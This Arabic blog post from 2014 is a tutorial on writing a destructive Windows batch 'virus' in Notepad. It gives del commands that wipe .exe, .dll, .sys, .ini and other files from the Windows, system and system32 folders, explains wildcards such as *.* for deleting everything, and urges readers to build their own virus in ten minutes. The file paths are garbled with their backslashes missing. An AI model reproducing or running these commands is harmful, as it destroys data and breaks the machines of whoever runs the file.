الخميس، 30 يناير 2014

كيفيه عمل فيروس يدمر الجهاز عن طريق المفكره

بسم الله الرحمن الرحيم

السلام عليكم ورحمه الله وبركاته

اقدم لكم فكره جميله وبسيطه عن الفيروسات وتقدر انك تعملها مع نفسك في 10 دقايق مش اكتر

نبدأ
حبيت اقلكم ان تصميم الفيروسات سهل اووي ومش محتاج خبره ولا حاجه زي ما كتير من الناس بتتوقع ان عمل الفيروسات لازم يبقا عنده خبره وكدا

-الفيروسات نوعان هي ما يصنع عن طريق برامج وهي اقوي الفيروسات واضرارها فادحه ولكن معظمها مكتشف من قبل برامج الانتي فيروس

وايضا ما يصنع عن طريف المفكره "نوتباد" وهي تعتبر اضعف من السابق وأضراره محدوده
علي حسب الكود المصنع ولكن معظمها غير مكتشفه من قبل برامج الانتي فيروس

أعلم

ان أهم شئ في صناعه الفيروس هي كود الفيروس وهذه هي الفكره كيف تصنع كود فيروس دون الاستعانه بشئ لا برامج ولا تنسخ اي كود يعني انت تصنع من نفسك

وطبعا اللي مش عارف الطريقه اوع يجربها علي جهازه وانا برئ من اي ضرر يلحق بجهازك

اول ما تنسخ الاكواد اللي في الاسفل وتضعها في المفكره وتحفظ المفكره بأمتداد Bat

فانت صنعت فيروس واحذر من فتحه

راح نبدأ الشرح

ملخص عن أوامر الفيروسات مهم جدااااااا :

* (( del ، deltree )) : أمر مسح : وهو أمر مهم ويكاد لا يخلو فيروس إلا وهذا الأمر فيه.
* (( *.exe )) : هذا الأمر يقوم بتحديد الملفات التي إمتدادها exe مهما كان إسمها.
* (( *.* )) : ويعتبر أقوى أوامر الفيروس على الاطلاق وهو قوي جداً وسيأتي شرحه.
* (( @echo off )) : وهذا الأمر يعطى في الفيروس لتنفيذ ما تحت هذا الأمر من أوامر بأسرع صورة ممكنة على شاشة الدوس.
* (( cls )) : لمسح الأوامر السابقة اللي نفذها الفيروس وبداية تنفيذ أوامر أخرى وهذا يعطى إذا كان الكود طويل ليتم تنفيذ الأمر التالي بصورة سريعة.

# وهذي أهم أوامر الفيروس وسنتعرف على أوامر أخرى في الأسفل لا تقول مو فاهم لا تابع
الشرح وأنا متأكد إنك راح تصنع فيروس خاص يسجل بإسمك.

بسم الله نبدأ شرح الأكواد :

الكود الأول

del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

واضح أن من صنع هذا الفيروس هو مبتدئ
لاحظ الأوامر اللي كتبها صاحب الكود وهي كالتالي :
أول شيء أعطى الأمر مسح .
ثاني شيء حدد مسار الملف اللي موجودة فيه الملفات المراد مسحها وهو ملف الويندوزC:windows
ثالث شيء حدد مسار الملفات المراد مسحها دون تحديد إسمها.

اول شي قدمه امر
del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:windows
C:windowssystem32
C:windowssystem
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المسارات الي يجب ان تنمسح .

* إذاً الفيروس = مسح + تحديد مسار الملف الموجودة فيه الملفات المراد مسحها + تحديد الملفات المراد مسحها .

توضيح :
الأمر الأول أعتقد واضح والأمر الثاني برضه واضح والثالث إليك توضيحة :

(( A.ini ))

لو وضع هذا الأمر لقام الفيروس بمسح الملفات اللي إسمها A وإمتدادها ini
مثلاً فيه ملفات إسمها B وإمتدادها ini وهي (( B.ini )) فإن الفيروس لن يمسحها لأن الاسم
قد إختلف وكذلك إذا إختلف الإمتداد فلن يمسح الفيروس إلا الاسم والامتداد المحددين له
لذا فإن هذا الأمر ضعيف جداً.

(( *.ini ))

وهذا ما استخدمه صاحب الكود السابق وهو مسح جميع الملفات اللي إمتدادها ini
مهما كان إسمها إذاً هذه العلامة (( * )) تعني جميع الملفات الموجودة وهذا الأمر يعتبر متوسط القوة
لانه قد حدد المسار.

(( *.* ))

وهذا الأمر هو الأقوى على الاطلاق لانه أعطى أمر بمسح جميع الملفات الموجودة في الملف
المحدد مهما كان إسمها ومهما كان إمتدادها.

ليست هناك تعليقات:

إرسال تعليق


جميع الحقوق محفوظة لمدونة عمرالصعيدي ©2013-2014 | إتصل بنا | عمرالصعيدي